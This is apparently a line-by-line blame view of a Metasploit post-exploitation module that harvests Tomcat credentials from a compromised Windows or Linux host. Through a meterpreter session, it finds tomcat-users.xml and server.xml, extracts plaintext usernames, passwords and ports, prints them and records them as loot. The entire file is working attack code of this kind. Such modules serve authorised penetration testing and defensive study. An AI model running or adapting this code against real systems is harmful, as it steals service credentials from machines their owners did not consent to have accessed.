2017-07-13 22:53:59 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2017-07-13 22:53:59 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
2017-02-24 14:15:55 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Post
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Services
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Gather Tomcat Credentials',
|
|
|
|
'Description' => %q{
|
|
|
|
This module will attempt to collect credentials from Tomcat services running on the machine.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [
|
|
|
|
'Koen Riepe <koen.riepe@fox-it.com>', # Module author
|
|
|
|
],
|
|
|
|
'Platform' => [ 'win', 'linux' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
$username = []
|
|
|
|
$password = []
|
|
|
|
$port = []
|
|
|
|
$paths = []
|
2017-02-24 14:15:55 +00:00
|
|
|
|
|
|
|
def report_creds(user, pass, port)
|
|
|
|
return if (user.empty? or pass.empty?)
|
|
|
|
# Assemble data about the credential objects we will be creating
|
|
|
|
credential_data = {
|
|
|
|
origin_type: :session,
|
|
|
|
post_reference_name: self.fullname,
|
|
|
|
private_data: pass,
|
|
|
|
private_type: :password,
|
|
|
|
session_id: session_db_id,
|
|
|
|
username: user,
|
|
|
|
workspace_id: myworkspace_id,
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_core = create_credential(credential_data)
|
|
|
|
|
|
|
|
if not port.is_a? Integer
|
|
|
|
port = 8080
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status("Port not an Integer, defaulting to port #{port} for creds database")
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: credential_core,
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
address: ::Rex::Socket.getaddress(session.sock.peerhost, true),
|
|
|
|
port: port,
|
|
|
|
service_name: 'Tomcat',
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
def gatherwin
|
|
|
|
print_status('Windows OS detected, enumerating services')
|
|
|
|
tomcatHomeArray = []
|
2017-02-24 14:15:55 +00:00
|
|
|
service_list.each do |service|
|
|
|
|
if service[:name].downcase().include? "tomcat"
|
2017-03-31 09:19:12 +00:00
|
|
|
print_good('Tomcat service found')
|
2017-03-08 09:11:05 +00:00
|
|
|
tomcatHomeArray.push(service_info(service[:name])[:path].split("\\bin\\")[0])
|
|
|
|
end
|
|
|
|
end
|
2017-03-08 09:16:06 +00:00
|
|
|
|
2017-03-08 09:11:05 +00:00
|
|
|
if tomcatHomeArray.size > 0
|
|
|
|
tomcatHomeArray.each do |tomcat_home|
|
|
|
|
if tomcat_home.include? '"'
|
|
|
|
tomcat_home = tomcat_home.split('"')[1]
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
conf_path = "#{tomcat_home}\\conf\\tomcat-users.xml"
|
2017-02-24 14:15:55 +00:00
|
|
|
|
|
|
|
if exist?(conf_path)
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status("#{conf_path} found!")
|
2017-02-24 14:15:55 +00:00
|
|
|
xml = read_file(conf_path).split("\n")
|
|
|
|
|
|
|
|
comment_block = false
|
|
|
|
xml.each do |line|
|
|
|
|
if line.include? "<user username=" and not comment_block
|
|
|
|
$username.push(line.split('<user username="')[1].split('"')[0])
|
|
|
|
$password.push(line.split('password="')[1].split('"')[0])
|
2017-03-31 09:19:12 +00:00
|
|
|
$paths.push(conf_path)
|
2017-02-24 14:15:55 +00:00
|
|
|
elsif line.include? ("<!--")
|
|
|
|
comment_block = true
|
|
|
|
elsif line.include? ("-->") and comment_block
|
|
|
|
comment_block = false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
port_path = "#{tomcat_home}\\conf\\server.xml"
|
2017-02-24 14:15:55 +00:00
|
|
|
if exist?(port_path)
|
|
|
|
xml = read_file(port_path).split("\n")
|
|
|
|
end
|
|
|
|
comment_block = false
|
|
|
|
xml.each do |line|
|
|
|
|
if line.include? "<Connector" and not comment_block
|
2017-03-08 09:11:05 +00:00
|
|
|
i=0
|
|
|
|
while i < $username.count
|
|
|
|
$port.push(line.split('<Connector port="')[1].split('"')[0].to_i)
|
|
|
|
i+=1
|
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
elsif line.include? ("<!--")
|
|
|
|
comment_block = true
|
|
|
|
elsif line.include? ("-->") and comment_block
|
|
|
|
comment_block = false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2017-03-08 09:11:05 +00:00
|
|
|
else
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status('No Tomcat home can be determined')
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
def gathernix
|
|
|
|
print_status('Unix OS detected')
|
2017-02-24 14:15:55 +00:00
|
|
|
user_files = cmd_exec('locate tomcat-users.xml').split("\n")
|
2017-03-08 09:16:06 +00:00
|
|
|
if user_files.size > 0
|
2017-03-08 09:11:05 +00:00
|
|
|
user_files.each do |path|
|
|
|
|
if exist?(path)
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status("#{path} found")
|
|
|
|
begin
|
|
|
|
xml = read_file(path).split("\n")
|
2017-03-08 09:11:05 +00:00
|
|
|
comment_block = false
|
|
|
|
xml.each do |line|
|
|
|
|
if line.include? "<user username=" and not comment_block
|
|
|
|
$username.push(line.split('<user username="')[1].split('"')[0])
|
|
|
|
$password.push(line.split('password="')[1].split('"')[0])
|
2017-03-31 09:19:12 +00:00
|
|
|
$paths.push(path)
|
2017-03-08 09:11:05 +00:00
|
|
|
elsif line.include? ("<!--")
|
|
|
|
comment_block = true
|
|
|
|
elsif line.include? ("-->") and comment_block
|
|
|
|
comment_block = false
|
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
2017-03-31 09:19:12 +00:00
|
|
|
rescue
|
2017-07-21 14:41:51 +00:00
|
|
|
print_error("Cannot open #{path} you probably don't have permission to open the file or parsing failed")
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
2017-03-31 09:19:12 +00:00
|
|
|
end
|
2017-03-08 09:11:05 +00:00
|
|
|
end
|
|
|
|
else
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status('No tomcat installation has been detected')
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
port_path = cmd_exec('locate server.xml').split("\n")
|
2017-03-08 09:16:06 +00:00
|
|
|
if port_path.size > 0
|
2017-03-08 09:11:05 +00:00
|
|
|
port_path.each do |path|
|
|
|
|
if exist?(path) and path.include? "tomcat"
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status("Attempting to extract Tomcat listening ports from #{path}")
|
|
|
|
begin
|
|
|
|
xml = read_file(path).split("\n")
|
|
|
|
comment_block = false
|
|
|
|
xml.each do |line|
|
|
|
|
if line.include? "<Connector" and not comment_block
|
|
|
|
i=0
|
|
|
|
while i < $username.count
|
|
|
|
$port.push(line.split('<Connector port="')[1].split('"')[0].to_i)
|
|
|
|
i+=1
|
|
|
|
end
|
|
|
|
elsif line.include? ("<!--")
|
|
|
|
comment_block = true
|
|
|
|
elsif line.include? ("-->") and comment_block
|
|
|
|
comment_block = false
|
2017-03-08 09:11:05 +00:00
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
2017-03-31 09:19:12 +00:00
|
|
|
rescue
|
2017-07-21 14:41:51 +00:00
|
|
|
print_status("Cannot open #{path} you probably don't have permission to open the file or parsing failed")
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
2017-03-08 09:11:05 +00:00
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
2017-03-08 09:11:05 +00:00
|
|
|
else
|
2017-03-31 09:19:12 +00:00
|
|
|
print_status('Failed to detect tomcat service port')
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
def run
|
2017-03-31 20:15:16 +00:00
|
|
|
if sysinfo
|
|
|
|
if sysinfo['OS'].include? "Windows"
|
|
|
|
gatherwin
|
|
|
|
else
|
|
|
|
gathernix
|
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
else
|
2017-03-31 20:15:16 +00:00
|
|
|
print_error('Incompatible session type, sysinfo is not available.')
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
if $username.size == 0
|
|
|
|
print_status("No user credentials have been found")
|
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
i=0
|
|
|
|
while i < $username.count
|
|
|
|
print_good("Username and password found in #{$paths[i]} - #{$username[i]}:#{$password[i]}")
|
|
|
|
report_creds($username[i],$password[i],$port[i])
|
|
|
|
i+=1
|
|
|
|
end
|
2017-02-24 14:15:55 +00:00
|
|
|
|
2017-03-31 09:19:12 +00:00
|
|
|
$username = []
|
|
|
|
$password = []
|
|
|
|
$port = []
|
|
|
|
$paths = []
|
2017-02-24 14:15:55 +00:00
|
|
|
end
|
|
|
|
end
|